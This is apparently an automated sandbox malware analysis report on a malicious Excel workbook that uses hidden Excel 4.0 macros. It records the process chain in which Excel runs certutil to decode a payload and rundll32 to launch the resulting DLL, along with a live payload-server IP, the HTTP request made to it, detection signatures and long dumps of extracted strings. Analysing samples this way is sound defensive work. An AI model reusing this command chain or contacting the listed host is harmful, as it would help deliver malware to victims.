Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Presentation_812525.xlsb

Overview

General Information

Sample Name:Presentation_812525.xlsb
Analysis ID:342076
MD5:4ddace9347c434a749eab40a211e6628
SHA1:c46b2b46bd274ad37bb5dbcea12bc8278f3b361e
SHA256:796d5317aae9d27707694f5e2832fe990d1a7890ac53ec339b8f1233fe05a3a7

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious Certutil Command
Uses certutil -decode
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 2996 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • certutil.exe (PID: 1488 cmdline: 'C:\Windows\System32\certutil.exe' -decode C:\Users\Public\94101.txt C:\Users\Public\94101.png2 MD5: D056DF596F6E02A36841E69872AEF7BD)
      • conhost.exe (PID: 3984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • certutil.exe (PID: 204 cmdline: 'C:\Windows\System32\certutil.exe' -decodehex C:\Users\Public\94101.png2 C:\Users\Public\94101.png MD5: D056DF596F6E02A36841E69872AEF7BD)
      • conhost.exe (PID: 5640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • rundll32.exe (PID: 3704 cmdline: 'C:\Windows\System32\rundll32.exe' C:\Users\Public\94101.png,In MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 5400 cmdline: C:\ProgramData\ioq\ioq.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\Public\94101.png2Msfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
  • 0x0:$x1: 4d5a9000030000000

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\rundll32.exe' C:\Users\Public\94101.png,In, CommandLine: 'C:\Windows\System32\rundll32.exe' C:\Users\Public\94101.png,In, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 2996, ProcessCommandLine: 'C:\Windows\System32\rundll32.exe' C:\Users\Public\94101.png,In, ProcessId: 3704
Sigma detected: Suspicious Certutil CommandShow sources
Source: Process startedAuthor: Florian Roth, juju4, keepwatch: Data: Command: 'C:\Windows\System32\certutil.exe' -decode C:\Users\Public\94101.txt C:\Users\Public\94101.png2, CommandLine: 'C:\Windows\System32\certutil.exe' -decode C:\Users\Public\94101.txt C:\Users\Public\94101.png2, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\certutil.exe, NewProcessName: C:\Windows\SysWOW64\certutil.exe, OriginalFileName: C:\Windows\SysWOW64\certutil.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 2996, ProcessCommandLine: 'C:\Windows\System32\certutil.exe' -decode C:\Users\Public\94101.txt C:\Users\Public\94101.png2, ProcessId: 1488

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\Public\94101.pngReversingLabs: Detection: 35%

Compliance:

barindex
Uses new MSVCR DllsShow sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
Uses secure TLS version for HTTPS connectionsShow sources
Source: unknownHTTPS traffic detected: 74.6.143.26:443 -> 192.168.2.3:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 87.248.100.215:443 -> 192.168.2.3:49709 version: TLS 1.2

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\certutil.exe
Source: global trafficDNS query: name: yahoo.com
Source: global trafficTCP traffic: 192.168.2.3:49708 -> 74.6.143.26:443
Source: global trafficTCP traffic: 192.168.2.3:49707 -> 172.104.129.156:80
Source: Joe Sandbox ViewIP Address: 87.248.100.215 87.248.100.215
Source: Joe Sandbox ViewASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /campo/o/o HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.104.129.156Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.129.156
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.129.156
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.129.156
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.129.156
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.129.156
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.129.156
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10001000 EntryPoint,GetProcAddress,GetProcAddress,CreateDirectoryA,URLDownloadToFileA,
Source: global trafficHTTP traffic detected: GET /campo/o/o HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.104.129.156Connection: Keep-Alive
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: <img src="https://sb.scorecardresearch.com/p?c1=2&c2=7241469&c7=https%3A%2F%2Fwww.yahoo.com%2F&c5=2023538075&cv=2.0&cj=1&c14=-1" /> equals www.yahoo.com (Yahoo)
Source: 9J0CLPJO.htm.6.drString found in binary or memory: C = {"useYAC":0,"usePE":0,"servicePath":"https:\/\/www.yahoo.com\/sdarla\/php\/fc.php","xservicePath":"","beaconPath":"https:\/\/www.yahoo.com\/sdarla\/php\/b.php","renderPath":"","allowFiF":false,"srenderPath":"https:\/\/s.yimg.com\/rq\/darla\/4-6-0\/html\/r-sf.html","renderFile":"https:\/\/s.yimg.com\/rq\/darla\/4-6-0\/html\/r-sf.html","sfbrenderPath":"https:\/\/s.yimg.com\/rq\/darla\/4-6-0\/html\/r-sf.html","msgPath":"https:\/\/fc.yahoo.com\/unsupported-1946.html","cscPath":"https:\/\/s.yimg.com\/rq\/darla\/4-6-0\/html\/r-csc.html","root":"sdarla","edgeRoot":"https:\/\/s.yimg.com\/rq\/darla\/4-6-0","sedgeRoot":"https:\/\/s.yimg.com\/rq\/darla\/4-6-0","version":"4-6-0","tpbURI":"","hostFile":"https:\/\/s.yimg.com\/rq\/darla\/4-6-0\/js\/g-r-min.js","beaconsDisabled":true,"rotationTimingDisabled":true,"fdb_locale":"What don't you like about this ad?|It's offensive|Something else|Thank you for helping us improve your Yahoo experience|It's not relevant|It's distracting|I don't like this ad|Send|Done|Why do I see ads?|Learn more about your feedback.|Want an ad-free inbox? Upgrade to Yahoo Mail Pro!|Upgrade Now","positions":{"DEFAULT":{"supports":false},"HPSPON":{"w":1,"h":1},"FPAD":{"w":1,"h":1},"LREC":{"w":300,"h":250},"MAST":{"w":1,"h":1},"MON":{"w":1,"h":1},"LREC4":{"w":300,"h":250},"LREC3":{"w":300,"h":250}},"lang":"en-US"}; equals www.yahoo.com (Yahoo)
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: C.positions = {"LREC":{"pos":"LREC","clean":"my-adsLREC","dest":"my-adsLREC-iframe","metaSize":true,"w":300,"h":250,"fdb":true,"supports":{"exp-ovr":0,"lyr":0},"doubleBuffering":false},"MAST":{"pos":"MAST","clean":"my-adsMAST","dest":"my-adsMAST-iframe","fr":"expIfr_exp","rmxp":0,"metaSize":true,"w":970,"h":250,"supports":{"exp-ovr":1,"exp-push":1,"resize-to":1,"lyr":1},"closeBtn":{"adc":0,"mode":2,"useShow":1},"fclose":2,"fdb":{"1":"1","where":"inside","on":1},"doubleBuffering":false},"MON":{"pos":"MON","clean":"my-adsMON","dest":"my-adsMON-iframe","metaSize":true,"w":300,"h":600,"fdb":true,"supports":{"exp-ovr":1,"resize-to":1,"lyr":0}},"LREC4":{"pos":"LREC4","id":"LREC4","clean":"my-adsLREC4","dest":"my-adsLREC4-iframe","doubleBuffering":false,"metaSize":true,"w":300,"h":250,"fdb":true,"supports":{"exp-ovr":0}},"LREC3":{"pos":"LREC3","id":"LREC3","clean":"my-adsLREC3","dest":"my-adsLREC3-iframe","metaSize":true,"w":300,"h":250,"fdb":true,"supports":{"exp-ovr":0}},"DEFAULT":{"sandbox":0,"meta":{"hostURL":"https:\/\/www.yahoo.com"}}}; equals www.yahoo.com (Yahoo)
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: _comscore.push({"c1":"2","c2":"7241469","c5":"2023538075","c7":"https:\/\/www.yahoo.com\/","c14":-1}); equals www.yahoo.com (Yahoo)
Source: 9J0CLPJO.htm.6.drString found in binary or memory: <link rel="canonical" href="https://www.yahoo.com/" /> <meta property="fb:pages" content="7040724713, 37510781596, 128015890542670, 73756409831, 1273983622628492, 183227235893, 107952415910993, 828031943896361, 338028696036, 228108177528276, 126435880711, 8603738371, 357311694375173, 168824166370, 116789651713844, 116789651713844, 284428852938, 116789651713844, 169590426398017, 150897358265131, 115060728528067, 358130347547704, 167601473274275, 166721106679241, 1573791532894850, 141301389258994, 138207559575213, 112996545439734, 345185573000, 131747896861126, 345185573000, 81262596234, 107143776010250, 137657892926963, 118757131504803" /> <meta name="referrer" content="unsafe-url"> <link href="https://s.yimg.com/os/yc/css/bundle.c60a6d54.css" rel="stylesheet" type="text/css"> equals www.yahoo.com (Yahoo)
Source: 9J0CLPJO.htm.6.drString found in binary or memory: <meta property="og:url" content="http://www.yahoo.com" /> equals www.yahoo.com (Yahoo)
Source: 9J0CLPJO.htm.6.drString found in binary or memory: <div><div id="footer-wrapper" role="contentinfo"><ul class="Lh(22px) Fz(13px) Ta(c)"><li class="D(ib) Mend(6px)"><a class="Tt(c) C($c-fuji-grey-o) C(#0078ff):h" data-ylk="t1:a4;t2:ft;t3:lst;sec:ft;elm:link;itc:0;rspns:nav" href="https://www.verizonmedia.com/policies/us/en/verizonmedia/terms/otos/index.html">Terms (Updated)</a></li><li class="D(ib) Mend(6px)"><a class="Tt(c) C($c-fuji-grey-o) C(#0078ff):h" data-ylk="t1:a4;t2:ft;t3:lst;sec:ft;elm:link;itc:0;rspns:nav" href="https://www.verizonmedia.com/policies/us/en/verizonmedia/privacy/index.html">Privacy (Updated)</a></li><li class="D(ib) Mend(6px)"><a class="Tt(c) C($c-fuji-grey-o) C(#0078ff):h" data-ylk="t1:a4;t2:ft;t3:lst;sec:ft;elm:link;itc:0;rspns:nav" href="https://www.verizonmedia.com/advertising">Advertise</a></li><li class="D(ib) Mend(6px)"><a class="Tt(c) C($c-fuji-grey-o) C(#0078ff):h" data-ylk="t1:a4;t2:ft;t3:lst;sec:ft;elm:link;itc:0;rspns:nav" href="https://www.verizonmedia.com/policies/us/en/verizonmedia/privacy/adinfo/index.html">About Our Ads</a></li><li class="D(ib) Mend(6px)"><a class="Tt(c) C($c-fuji-grey-o) C(#0078ff):h" data-ylk="t1:a4;t2:ft;t3:lst;sec:ft;elm:link;itc:0;rspns:nav" href="https://www.verizonmedia.com/careers">Careers</a></li><li class="D(ib) Mend(6px)"><a class="Tt(c) C($c-fuji-grey-o) C(#0078ff):h" data-ylk="t1:a4;t2:ft;t3:lst;sec:ft;elm:link;itc:0;rspns:nav" href="https://help.yahoo.com/kb/account">Help</a></li><li class="D(ib) Mend(6px)"><a class="Tt(c) C($c-fuji-grey-o) C(#0078ff):h" data-ylk="t1:a4;t2:ft;t3:lst;sec:ft;elm:link;itc:0;rspns:nav" href="https://yahoo.uservoice.com/forums/341361-yahoo-home?browser=ie&amp;bucket=FPTRELUG105&amp;os=windows%20nt&amp;partner=none&amp;location=US&amp;rid=90oo801g0gagb">Feedback</a></li></ul></div></div> <!-- App close --> equals www.yahoo.com (Yahoo)
Source: 9J0CLPJO.htm.6.drString found in binary or memory: s Breakthrough" aria-hidden="true" tabindex="-1"><div class="Fl(start) Maw(220px) W(26%) Mend(25px)"><div class="H(0) T(0px) Bdrs(2px) Start(0)" style="padding-bottom:52.11%"><img class="W(100%) Bdrs(2px)" src="https://s.yimg.com/uu/api/res/1.2/UFLqS.xvyj1podCMDQzrLA--~B/Zmk9c3RyaW07aD0xOTg7cT04MDt3PTM4MDthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/av/ads/1610831964757-4295.jpg.cf.jpg" alt=""/></div></div></a><div class="Ov(h) Pend(45px)"><div class="Pos(r) Z(2)"><a class="D(i) Ell Fz(13px) Mb(2px) Fw(b) C($streamItemGray) Td(n) Mend(6px)" href="https://www.verizonmedia.com/policies/us/en/verizonmedia/privacy/adinfo/index.html" data-ylk="elm:itm;elmt:sp;itc:0;bpos:1;cpos:23;cposy:46;rspns:nav;t1:a3;t2:strm;t3:ct;ccode:megastream_unified__en-US__frontpage__default__default__desktop__ga__noSplit;ct:ad;g:36172530333;grpt:singlestory;pkgt:sponsored_img;pos:1;ad:1;itc:0" rel="nofollow noopener noreferrer" target="_blank">Ad</a><a class="D(i) Fz(12px) C($streamItemGray) Ell Mb(2px) Td(n)" href="https://beap.gemini.yahoo.com/mbclk?bv=1.0.0&amp;es=fQKaxu0GIS8L4ViC9YFGxIq6qeSf43.RmLTLfskM62lwTjP2h32LScnFLYzFp.DOwkXmPDtJ2ncDwX2gM3YotBJT_8WqYtq9N7Ss2iBl0BK2.5HBXOWYuhsKvWivKCpDJUJ3d8LGz_FK4XJTJxeEJfkBo1QeCkgm7RK.r70NeZ7QiQyrso3r3.KfAkDxkYR3p0kOjdGJphXX2Hr.g94q1GoJaLdsGaEh3E529_x73CS5WbWtOj83_nx2HcC3hHNr3uxXv_uGiemUUwjL8YewW3DVPd71mfocI281qx8LctOZlbyDP4.JMJL_OS7WWlw9x6McMaumrH0gb9wbJqZLmsEyeZ.6yq9pfI0tjLxcna24dBJQauhqNOIOEzSZIO17de9.1bv_gDmZXzrP1miP3qSj5hKSbVmCYyuYuG3AAGHP9dl_EVAde7afXi2OM0hio0YBkddeEgvIp1jvbbYiKZOGSRVz.5Y0z4cEwvQ6WwhJAj70Ej9WzuHfUuuruq5JTGwHwC9Cc2soYgPXOn5HTNmTpeqk2B9P5.AWIpNOi.NftSEMw.PxJceX9H17gsQig75qPUWC" rel="nofollow noopener noreferrer" target="_blank" data-ylk="elm:itm;elmt:ad;itc:0;bpos:1;cpos:23;cposy:46;rspns:nav;t1:a3;t2:strm;t3:ct;ccode:megastream_unified__en-US__frontpage__default__default__desktop__ga__noSplit;ct:ad;g:36172530333;grpt:singlestory;pkgt:sponsored_img;pos:1;ad:1;itc:0">Physics Market News</a></div><div class="Pos(r) ad-content"><a class="D(b) Td(n) C($c-fuji-blue-4-b) ad-content:h_C($streamHoverClass)" href="https://beap.gemini.yahoo.com/mbclk?bv=1.0.0&amp;es=fQKaxu0GIS8L4ViC9YFGxIq6qeSf43.RmLTLfskM62lwTjP2h32LScnFLYzFp.DOwkXmPDtJ2ncDwX2gM3YotBJT_8WqYtq9N7Ss2iBl0BK2.5HBXOWYuhsKvWivKCpDJUJ3d8LGz_FK4XJTJxeEJfkBo1QeCkgm7RK.r70NeZ7QiQyrso3r3.KfAkDxkYR3p0kOjdGJphXX2Hr.g94q1GoJaLdsGaEh3E529_x73CS5WbWtOj83_nx2HcC3hHNr3uxXv_uGiemUUwjL8YewW3DVPd71mfocI281qx8LctOZlbyDP4.JMJL_OS7WWlw9x6McMaumrH0gb9wbJqZLmsEyeZ.6yq9pfI0tjLxcna24dBJQauhqNOIOEzSZIO17de9.1bv_gDmZXzrP1miP3qSj5hKSbVmCYyuYuG3AAGHP9dl_EVAde7afXi2OM0hio0YBkddeEgvIp1jvbbYiKZOGSRVz.5Y0z4cEwvQ6WwhJAj70Ej9WzuHfUuuruq5JTGwHwC9Cc2soYgPXOn5HTNmTpeqk2B9P5.AWIpNOi.NftSEMw.PxJceX9H17gsQig75qPUWC" rel="nofollow noopener noreferrer" target="_blank" data-ylk="elm:hdln;elmt:ad;itc:0;bpos:1;cpos:23;cposy:46;rspns:nav;t1:a3;t2:strm;t3:ct;ccode:megastream_unified__en-US__frontpage__default__default__desktop__ga__noSplit;ct:ad;g:36172530333;grpt:singlestory;pkgt:sponsored_img;pos:1;ad:1
Source: rundll32.exe, 00000006.00000002.250006343.000000000452A000.00000004.00000010.sdmpString found in binary or memory: www.yahoo.com equals www.yahoo.com (Yahoo)
Source: rundll32.exe, 00000006.00000002.250797242.0000000004B00000.00000004.00000001.sdmpString found in binary or memory: yBiKz1QiFeZaAGxCelF1Hc5BCEh7kSE8LBpzpMcl9SEh_3NsKzCXu9GOgNnTGKHhDRvpeU3IzgMdr5LuxYi6dBmXwzkz2IHY53n.taE36_gLJKsifXETy8dDi9K9.YDQHxM2onOlESAa_DI.BUuDPbGkABxfDwvPHzChyIV5iZCxOeGKc_B5ngw3vbsf5AZWxmND0Krhp6K2S3UjxLuGzIrsbWWcKfvB..6LDNsjGUHh5x3FxKkJy8ae3kEA1NMZznRQLQXAOe5C9YIqCtJ6eKxpg4tWyeq.FpA5DmffnYqBefkvcD8qFFHdr5qqBQ5rgEVhvI1TSI5z0Uon0GvJcN4KoxJXkLxtW3Yrp7a3Ru4-&amp;ap=17" data-wf-image-beacons=""><div class="Py(12px) Pos(r) Cf show-then-hide-ad-confirmation_D(n) hide-ad_D(n)"><a class="D(b) Td(n)" href="https://beap.gemini.yahoo.com/mbclk?bv=1.0.0&amp;es=.e0macUGIS.Fz63sr2P207YOEOlgDwoy2SQq4Qs8SQ3DYflEuodImfcAUDa5sPXHtSLDC52eE7P3.FDorzgLz6ex3KnfPileCmoFuF_6StqbvON.w8omSvOAHONh2WFvW0D8JAIjw3j0gRcNM.TG6ik6.wz8z_wIfdaQXqAlgog68biboszlOHf8xTNgR1uIYNshTXcaoUA0NM_t89FQ8FF6ppirRbkIIaxqCDAgEbKTzNbtP8Vk81_b3wqEd2hkveZKOwTeLsl_.yERN8gTo31BtrMABjWPXN7gpumNPuTxNzmteHQLgjjOvwHKmCw1mDvIpNyYar4K5aRUWmrbjG4ZZ95GuMp5Yc7RhjM3fvcDf67ddnT_5Cy2KYKhViTcoR7GHQ.CuPuoiOnwSdxE83_84evjBqB7aTQiCuGXiMgR1elXIrv27E9LDJX_pclNeIrQgv8cgmee576220cW9zdNqjYr9qbRsxDy9u8huu7w0HacXp_Y8ajQly8PL8akuxQOd0NKDQF3FEHwL8aT7ISiZEurtqTUePgw3XhJ67f_" rel="nofollow noopener noreferrer" target="_blank" data-ylk="elm:img;elmt:ad;itc:0;bpos:1;cpos:18;cposy:37;rspns:nav;t1:a3;t2:strm;t3:ct;ccode:megastream_unified__en-US__frontpage__default__default__desktop__ga__noSplit;ct:ad;g:36174217417;grpt:singlestory;pkgt:sponsored_img;pos:1;ad:1;itc:0;slk:China&#x27;s Giant Is Setting Up New Venture" aria-hidden="true" tabindex="-1"><div class="Fl(start) Maw(220px) W(26%) Mend(25px)"><div class="H(0) T(0px) Bdrs(2px) Start(0)" style="padding-bottom:52.11%"><img class="W(100%) Bdrs(2px)" src="https://s.yimg.com/uu/api/res/1.2/ukebcHBGNd6YYmQqOpTWGQ--~B/Zmk9c3RyaW07aD0xOTg7cT04MDt3PTM4MDthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/av/ads/1610884787084-2051.jpg.cf.jpg" alt=""/></div></div></a><div class="Ov(h) Pend(45px)"><div class="Pos(r) Z(2)"><a class="D(i) Ell Fz(13px) Mb(2px) Fw(b) C($streamItemGray) Td(n) Mend(6px)" href="https://www.verizonmedia.com/policies/us/en/verizonmedia/privacy/adinfo/index.html" data-ylk="elm:itm;elmt:sp;itc:0;bpos:1;cpos:18;cposy:37;rspns:nav;t1:a3;t2:strm;t3:ct;ccode:megastream_unified__en-US__frontpage__default__default__desktop__ga__noSplit;ct:ad;g:36174217417;grpt:singlestory;pkgt:sponsored_img;pos:1;ad:1;itc:0" rel="nofollow noopener noreferrer" target="_blank">Ad</a><a class="D(i) Fz(12px) C($streamItemGray) Ell Mb(2px) Td(n)" href="https://beap.gemini.yahoo.com/mbclk?bv=1.0.0&amp;es=.e0macUGIS.Fz63sr2P207YOEOlgDwoy2SQq4Qs8SQ3DYflEuodImfcAUDa5sPXHtSLDC52eE7P3.FDorzgLz6ex3KnfPileCmoFuF_6StqbvON.w8omSvOAHONh2WFvW0D8JAIjw3j0gRcNM.TG6ik6.wz8z_wIfdaQXqAlgog68biboszlOHf8xTNgR1uIYNshTXcaoUA0NM_t89FQ8FF6ppirRbkIIaxqCDAgEbKTzNbtP8Vk81_b3wqEd2hkveZKOwTeLsl_.yERN8gTo31BtrMABjWPXN7gpumNPuTxNzmteHQLgjjOvwHKmCw1mDvIpNyYar4K5aRUWmrbjG4ZZ95GuMp5Yc7RhjM3fvcDf67ddnT_5Cy2KYKhViTcoR7GHQ.CuPuoiOnwSdxE83_84evjBqB7aTQiCuGXiMgR1elXIrv27E9LDJX_pclNeIrQgv8cgmee576220cW9zdNqjYr9qbRsxDy9u8huu7w0HacXp_Y
Source: unknownDNS traffic detected: queries for: yahoo.com
Source: 94101.png.4.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: 94101.png.4.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: 9J0CLPJO.htm.6.drString found in binary or memory: http://modernizr.com/download/#-touch-cssclasses-teststyles-prefixes
Source: 94101.png.4.drString found in binary or memory: http://ocsp.sectigo.com0
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 9J0CLPJO.htm.6.drString found in binary or memory: http://www.yahoo.com
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://aka-cdn.adtechus.com/images/ATCollapse.gif
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://api.aadrm.com/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://api.cortana.ai
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://api.office.net
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://api.onedrive.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://augloop.office.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://augloop.office.com/v2
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://baseball.fantasysports.yahoo.com/b1/signup
Source: rundll32.exe, 00000006.00000002.250797242.0000000004B00000.00000004.00000001.sdmpString found in binary or memory: https://beap.gemini.yahoo.com/mbclk?bv=1.0.0&amp;es=.e0macUGIS.Fz63sr2P207YOEOlgDwoy2SQq4Qs8SQ3DYflE
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://beap.gemini.yahoo.com/mbclk?bv=1.0.0&amp;es=fQKaxu0GIS8L4ViC9YFGxIq6qeSf43.RmLTLfskM62lwTjP2
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://bf.us.y.atwola.com/?adlink
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://bf.us.y.atwola.com/adcount%7C2.0%7C5113.1%7C4830399%7C0%7C170%7CAdId=10679286;BnId=2;ct=2475
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://bf.us.y.atwola.com/adcount%7C2.0%7C5113.1%7C4830424%7C0%7C0%7CAdId=-3;BnId=0;ct=2475606453;s
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://bf.us.y.atwola.com/adcount%7C2.0%7C5113.1%7C4830462%7C0%7C170%7CAdId=10679288;BnId=2;ct=2475
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://bf.us.y.atwola.com/adcount%7C2.0%7C5113.1%7C4867771%7C0%7C0%7CAdId=-41;BnId=0;ct=2475606453;
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://cdn.entity.
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://clients.config.office.net/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
